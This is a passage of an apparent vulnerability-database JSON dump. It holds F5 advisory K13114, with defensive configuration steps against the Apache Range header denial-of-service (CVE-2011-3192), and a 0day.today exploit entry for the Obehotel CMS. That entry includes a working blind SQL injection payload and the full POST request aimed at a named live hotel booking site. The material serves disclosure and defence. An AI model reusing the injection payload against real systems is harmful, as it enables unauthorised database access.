to protect vulnerable back-end 
Apache servers](<https://support.f5.com/csp/article/K13114#configure>)\n * [FirePass](<https://support.f5.com/csp/article/K13114#firepass>)\n * [Enterprise Manager 2.x](<https://support.f5.com/csp/article/K13114#2.x>)\n * [Enterprise Manager 1.x](<https://support.f5.com/csp/article/K13114#1.x>)\n * [ARX](<https://support.f5.com/csp/article/K13114#arx>)\n\n**BIG-IP 11.x** \n\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the **Versions known to be Not Vulnerable** column of the table.\n\nTo mitigate this vulnerability, you can unset suspect **Range** and **Request-Range** headers in inbound requests. To do so, perform the following procedure: \n\n\n**Impact of procedure:** The **Range** header will be removed from a request only when more than five ranges are specified and the **Request-Range **header will be removed from all requests. \n\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by entering the following command: \n \ntmsh \n \n**Note**: If you are currently logged in to the **tmsh** shell, you can skip this step.\n 2. Modify the configuration of the** httpd **service by typing the following command: \n \nedit sys httpd\n 3. The previous command opens a text editor that you can use to modify the configuration of the **httpd** service. The text editor displays the following line: \n \nmodify httpd { }\n 4. Replace the above line with the following lines: \n \nmodify httpd { \ninclude \" \n# CVE-2011-3192 \n# Drop the Range header when more than 5 ranges \nSetEnvIf Range (,.*?){5,} bad-range=1 \nRequestHeader unset Range env=bad-range \nRequestHeader unset Request-Range\" \n}\n 5. Save the file using the name suggested by the text editor (for example, **/var/tmp/tmsh/2tKkrO/data**).\n 6. Upon exiting the text editor, the** tmsh** displays the following prompt: \n \nSave changes? (y/n/e)\n 7. Save the changes by typing the following: \n \ny\n 8. Save the configuration by typing the following command: \n \nsave sys config\n 9. 
Restart the** httpd** service by typing the following command: \n \nrestart sys service httpd\n\n**BIG-IP 10.1.0 through 10.2.2**\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the **Versions known to be Not Vulnerable** column of the table.\n\nTo mitigate this vulnerability, you can unset suspect **Range** and **Request-Range **headers in inbound requests. To do so, perform the following procedure: \n\n\n**Impact of procedure:** The **Range** header will be removed from a request only when more than five ranges are specified and the **Request-Range **header will be removed from all requests. \n\n\n 1. Log in to the BIG-IP system command line.\n 2. Change directories to the** /var/tmp** directory by typing the following command: \n \ncd /var/tmp\n 3. Using a text editor, create a new file named **CVE-2011-3192 **and paste the following lines into it: \n \nhttpd include \" \n# CVE-2011-3192 \n# Drop the Range header when more than 5 ranges \nSetEnvIf Range (,.*?){5,} bad-range=1 \nRequestHeader unset Range env=bad-range \nRequestHeader unset Request-Range\" \n\n 4. Save the new file.\n 5. Merge the** CVE-2011-3192** file into the BIG-IP system configuration by typing the following command: \n \nbpsh < CVE-2011-3192\n 6. Save the configuration by typing the following command: \n \nbigpipe save all \n\n 7. Restart the **httpd** service by typing the following command: \n \nbigstart restart httpd\n\n**BIG-IP 9.4.2 through 10.0.1 \n**\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the** Versions known to be Not Vulnerable** column of the table.\n\nTo mitigate this vulnerability, you can unset all **Range** and **Request-Range **headers in inbound requests. To do so, perform the following procedure: \n\n\n**Impact of procedure:** The **Range** and **Request-Range **headers will be removed from all requests.\n\n 1. Log in to the BIG-IP system command line.\n 2. 
Change directories to the** /var/tmp** directory by typing the following command: \n \ncd /var/tmp\n 3. Using a text editor, create a new file named CVE-2011-3192 and paste the following lines into it: \n \nhttpd include \" \n# CVE-2011-3192 \nRequestHeader unset Range \nRequestHeader unset Request-Range\" \n\n 4. Save the new file.\n 5. Merge the **CVE-2011-3192 **file into the BIG-IP system configuration by typing the following command: \n \nbpsh < CVE-2011-3192\n 6. Save the configuration by typing the following command: \n \nbigpipe save all\n 7. Restart the **httpd** service by typing the following command: \n \nbigstart restart httpd\n\n**BIG-IP 9.0.0 through 9.4.1** \n\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the **Versions known to be Not Vulnerable** column of the table.\n\nTo mitigate this vulnerability, you can unset all **Range** and **Request-Range **headers in inbound requests. To do so, perform the following procedure: \n\n\n**Impact of procedure:** The **Range **and **Request-Range **headers will be removed from all requests. \n\n\n 1. Log in to the BIG-IP system command line.\n 2. Change directories to the **/config/httpd/conf** directory by typing the following command: \n \ncd /config/httpd/conf\n 3. Back up the original **httpd.conf** file by typing the following command: \n \ncp httpd.conf httpd.conf.bak\n 4. Open the **httpd.conf** file in a text editor.\n 5. Add the following lines to the end of the file: \n \n# CVE-2011-3192 \nRequestHeader unset Range \nRequestHeader unset Request-Range \n\n 6. Save the** httpd.conf** file.\n 7. Restart the** httpd** service by typing the following command: \n \nbigstart restart httpd\n\n**Configure BIG-IP virtual servers to protect vulnerable back-end Apache servers**\n\nWhile the BIG-IP virtual servers are not vulnerable, the BIG-IP system will proxy exploits to vulnerable Apache servers behind the BIG-IP system. 
You can protect these servers by removing the **Range **header from all requests. To do so, apply an iRule containing the following logic to each BIG-IP virtual server:\n\n**Impact of recommended action:** The **Range** header will be removed from all requests.\n\nwhen HTTP_REQUEST { \n # remove Range requests for CVE-2011-3192 \n HTTP::header remove Range \n HTTP::header remove Request-Range \n} \n\n\nIt is possible to use a custom BIG-IP ASM attack signature or more sophisticated iRule logic to protect back-end Apache servers. For more information, refer to the DevCentral article referenced in the [Supplemental Information](<https://support.f5.com/csp/article/K13114#supplemental>) section.\n\n**FirePass**\n\n * None\n\n**Enterprise Manager 2.x** \n\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the **Versions known to be Not Vulnerable** column of the table.\n\nTo mitigate this vulnerability, you can unset suspect **Range** and **Request-Range **headers in inbound requests. To do so, perform the following procedure: \n\n\n**Impact of procedure:** The **Range** header will be removed from a request only when more than five ranges are specified and the **Request-Range **header will be removed from all requests. \n\n 1. Log in to the Enterprise Manager system command line.\n 2. Change directories to the** /var/tmp** directory by typing the following command: \n \ncd /var/tmp\n 3. Using a text editor, create a new file named** CVE-2011-3192** and paste the following lines into it: \n \nhttpd include \" \n# CVE-2011-3192 \n# Drop the Range header when more than 5 ranges \nSetEnvIf Range (,.*?){5,} bad-range=1 \nRequestHeader unset Range env=bad-range \nRequestHeader unset Request-Range\"\n 4. Save the new file.\n 5. Merge the** CVE-2011-3192** file into the BIG-IP system configuration by typing the following command: \n \nbpsh < CVE-2011-3192\n 6. Save the configuration by typing the following command: \n \nbigpipe save all\n 7. 
Restart the** httpd** service by typing the following command: \n \nbigstart restart httpd\n\n**Enterprise Manager 1.x** \n\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the **Versions known to be Not Vulnerable** column of the table.\n\nTo mitigate this vulnerability, you can unset suspect **Range** and **Request-Range **headers in inbound requests. To do so, perform the following procedure: \n\n\n**Impact of procedure:** The **Range** and **Request-Range **headers will be removed from all requests.\n\n 1. Log in to the Enterprise Manager system command line.\n 2. Change directories to the** /config/httpd/conf** directory by typing the following command: \n \ncd /config/httpd/conf\n 3. Back up the original **httpd.conf** file by typing the following command: \n \ncp httpd.conf httpd.conf.bak\n 4. Open the **httpd.conf** file in a text editor.\n 5. Add the following lines to the end of the file: \n \n# CVE-2011-3192 \nRequestHeader unset Range \nRequestHeader unset Request-Range \n 6. Save the** httpd.conf** file.\n 7. Restart the **httpd **service by typing the following command: \n \nbigstart restart httpd\n\n**ARX**\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the **Versions known to be Not Vulnerable** column of the table.\n\nTo mitigate this vulnerability, do not enable the API functionality. \n\n\n * [CERT advisory regarding CVE-2011-3192](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192>)\n * [Apache Security Advisory regarding CVE-2011-3192](<http://people.apache.org/~dirkx/CVE-2011-3192.txt>)\n\n**Note**: This link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n * [DevCentral: F5 Friday: Zero-Day Apache Exploit? 
Zero-Problem](<https://devcentral.f5.com/s/articles/f5-friday-zero-day-apache-exploit-zero-problem>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K10025: Managing F5 product hotfixes for BIG-IP version 10.x systems](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 15.x)](<https://support.f5.com/csp/article/K31123>)\n", "modified": "2019-06-06T18:27:00", "published": "2013-09-12T04:10:00", "id": "F5:K13114", "href": "https://support.f5.com/csp/article/K13114", "title": "Apache Range header vulnerability - CVE-2011-3192", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "zdt": [{"lastseen": "2018-02-06T05:14:16", "bulletinFamily": "exploit", "description": "Obehotel CMS suffers from denial of service, insecure transit, directory listing, and remote SQL injection vulnerabilities.", "modified": "2013-08-27T00:00:00", "published": "2013-08-27T00:00:00", "id": "1337DAY-ID-21170", "href": "https://0day.today/exploit/description/21170", "type": "zdt", "title": "Obehotel CMS SQL Injection Vulnerability", "sourceData": "OBEHOTEL (Spanish) CMS Blind SQLinjection / Apache httpd Remote Denial of Service / Directory Listing / Insecure transition from HTTPS to HTTP in form post\r\n\r\nI-VULNERABILITY\r\n-------------------------\r\n\r\n#Title: OBEHOTEL CMS Blind SQLinjection / Apache httpd Remote Denial of Service / 
Directory Listing / Insecure transition from HTTPS to HTTP in form post\r\n\r\n#Vendor:https://secureadv.obehotel.com/mpa/\r\n\r\n#Author:Juan Carlos Garc\u00eda (@secnight)\r\n\r\n#Follow me \r\n\r\n http://www.highsec.es\r\n http://hackingmadrid.blogspot.com\r\nTwitter:@secnight\r\n\r\n\r\n\r\nII-Introduction:\r\n================\r\n\r\nObehotel is the set of different solutions, technological developments and applications directed\r\nto hotels for online marketing and distribution aimed at improving both hoteliers processes such as customer experience.\r\n\r\nObehotel is the result of joint effort conducted by professionals with extensive experience in the ICT-Sector\r\nEfimatica-and marketing professionals-Travel Tourism Sector Holidaysinspain.com-like main online distribution partner.\r\n\r\nThis union puts them as one of the major Spanish companies specializing in online distribution technology applied to the Hospitality Industry.\r\n\r\n-------------------------\r\n\r\nIII-PROOF OF CONCEPT\r\n====================\r\n\r\n\r\nAttack details\r\n--------------\r\n\r\nBlind SqlInjection\r\n******************\r\n\r\nSQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input.\r\n\r\nAn SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't\r\nproperly filter out dangerous characters. \r\n\r\nAn attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. \r\n\r\nDepending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker.\r\n\r\nIt may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. 
In some cases,\r\nit may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.\r\n\r\nCertain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). \r\n\r\nIf an attacker can obtain access to these procedures it may be possible to compromise the entire machine.\r\n\r\n\r\n\r\nAttack details\r\n--------------\r\n\r\nURL encoded POST input username was set to\r\n\r\nxlgskuot' or (sleep(2)+1) limit 1 -- \r\n\r\nPOST /mpa/index.php \r\n\r\n\r\nServer: Apache/2.2.16 (Debian)\r\nX-Powered-By: PHP/5.3.3-7+squeeze14\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nLocation: ./hotel_inicio/index.php\r\nVary: Accept-Encoding\r\nContent-Length: 3402\r\nKeep-Alive: timeout=15, max=92\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=utf-8\r\n\r\n\r\npassword=g00dPa$$w0rD&username=xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20\r\n\r\nvariant (1)\r\n\r\nname\r\n\r\nPOST /mpa/index.php HTTP/1.1\r\nContent-Length: 92\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: PHPSESSID=sto2bv4krb2h4f0n45tm6o4hn3\r\nHost: secureadv.obehotel.com\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\r\nAccept: */*\r\n\r\npassword=g00dPa$$w0rD&username=xlgskuot%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21170"}]}